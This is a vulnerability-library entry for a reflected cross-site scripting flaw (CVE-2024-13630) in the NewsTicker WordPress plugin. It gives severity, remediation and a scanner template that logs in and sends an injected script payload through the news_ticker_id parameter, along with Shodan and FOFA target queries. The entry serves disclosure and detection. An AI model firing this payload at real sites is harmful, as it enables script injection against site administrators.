/Vulnerability Library

NewsTicker <= 1.0 - Reflected Cross-Site Scripting

CVE-2024-13630
Verified

Description

NewsTicker WordPress plugin v1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

2%

Affected Product

newsticker

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13630.yaml
id: CVE-2024-13630

info:
  name: NewsTicker <= 1.0 - Reflected Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    NewsTicker WordPress plugin v1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/15eed487-01ac-4c1e-88f8-26cfa036fb54/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13630
    cwe-id: CWE-79
    epss-score: 0.01725
    epss-percentile: 0.82651
    cpe: cpe:2.3:a:mahinsha:newsticker:1.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mahinsha
    product: newsticker
    shodan-query: http.component:"WordPress"
    fofa-query: body="news-ticker"
  tags: cve,cve2024,wordpress,wpscan,wp,wp-plugin,newsticker,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=update_news&news_ticker_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>")
        condition: and
# digest: 4b0a00483046022100d2dd12b902ef7c7b814abf019969b7ee8a9a95414994d5fd9e6af0f879c2ccf3022100fbd2a5a17c50d60827bedba5d79962c68a3aac0546e86fbf5d54bfd2a8908210:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13630
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/15eed487-01ac-4c1e-88f8-26cfa036fb54/https://nvd.nist.gov/vuln/detail/CVE-2024-13630

Remediation Steps

Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.